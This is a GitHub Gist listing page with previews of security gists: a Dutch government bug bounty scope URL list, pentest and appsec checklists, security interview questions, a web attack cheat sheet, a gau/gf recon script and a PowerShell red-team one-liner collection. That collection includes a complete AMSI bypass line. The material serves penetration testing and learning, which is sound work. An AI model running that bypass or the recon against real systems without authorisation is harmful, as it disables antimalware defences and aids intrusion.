Skip to content

Instantly share code, notes, and snippets.

@random-robbie
random-robbie / DutchGov.txt
Last active September 11, 2024 04:28
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
http://www.rijksoverheid.nl
http://www.rivm.nl
http://coronadashboard.rijksoverheid.nl
http://www.nederlandwereldwijd.nl
http://www.government.nl
http://lci.rivm.nl
http://www.rvo.nl
http://www.defensie.nl
http://www.werkenvoornederland.nl
http://www.rijkswaterstaat.nl
@MrMugiwara
MrMugiwara / NetSecCheck.md
Created June 22, 2017 23:08
Network Security VAPT Checklist

Hi dear reader, there are very few technical network security assessment checklist. So I thought to share my own on this. Have a look and enjoy. Lets talk about the scope first. If you are given a 1000 machines to perform VAPT, then here is your scope. Single machine can have 65535 ports open. Any single port can deploy any service software from the world. For example FTP can be run on smartftp, pureftpd etc.. Any single FTP software version (for example pureftpd 1.0.22) can have number of vulnerabilities available. So if you multiply all of these, then it is impossible for any auditor to go ahead and probe all ports manually and find services manually. Even if he/she is able to do it, it is impossible to check all vulnerabilities that are pertaining to a single port of a single machine. Hence we have to rely on scanners such as nexpose, nessus, openvas, coreimpact etc. Here are some quick tools and test cases that one can perform on commonly found ports in the network pentest.

Identify live host

@jhaddix
jhaddix / Testing_Checklist.md
Last active November 16, 2024 11:54 — forked from amotmot/WAHH_Task_Checklist.md
Fast Simple Appsec Testing Checklist
@namishelex01
namishelex01 / Security Engineer - Interview Questions.md
Last active September 15, 2024 11:34
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names

Core Information Security

  • What is information security and how is it achieved?

  • What are the core principles of information security?

  • What is the CIA triangle?

  • What is non-repudiation (as it applies to IT security)?

██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗
██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║
██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║
██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║
██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║
╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝
@intx0x80
@secfb
secfb / Web-Attack-Cheat-Sheet.md
Created May 8, 2020 20:53
Web-Attack-Cheat-Sheet.md

Web-Attack-Cheat-Sheet

Discovering

Bug Bount Targets

https://github.com/arkadiyt/bounty-targets-data

IP Enumeration

http://www.asnlookup.com/
@gh0sh
gh0sh / gf-and-gau-automate.sh
Last active November 30, 2022 10:02
Simple script to look for juicy endpoints with gf and gau
#!/usr/bin/env bash
#
# Requirements
# - Golang (for complete bug bounty tools, clone this https://github.com/x1mdev/ReconPi)
# - gau (go get -u github.com/lc/gau)
# - gf (go get -u github.com/tomnomnom/gf)
# - Gf-Patterns (https://github.com/1ndianl33t/Gf-Patterns) - Read the README.md for how to copy json file to ~/.gf/
cd ~/.gf
ls *.json > ~/patterns
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
@yezz123
yezz123 / Exploitation.md
Created May 24, 2021 12:09
Pentesting-Exploitation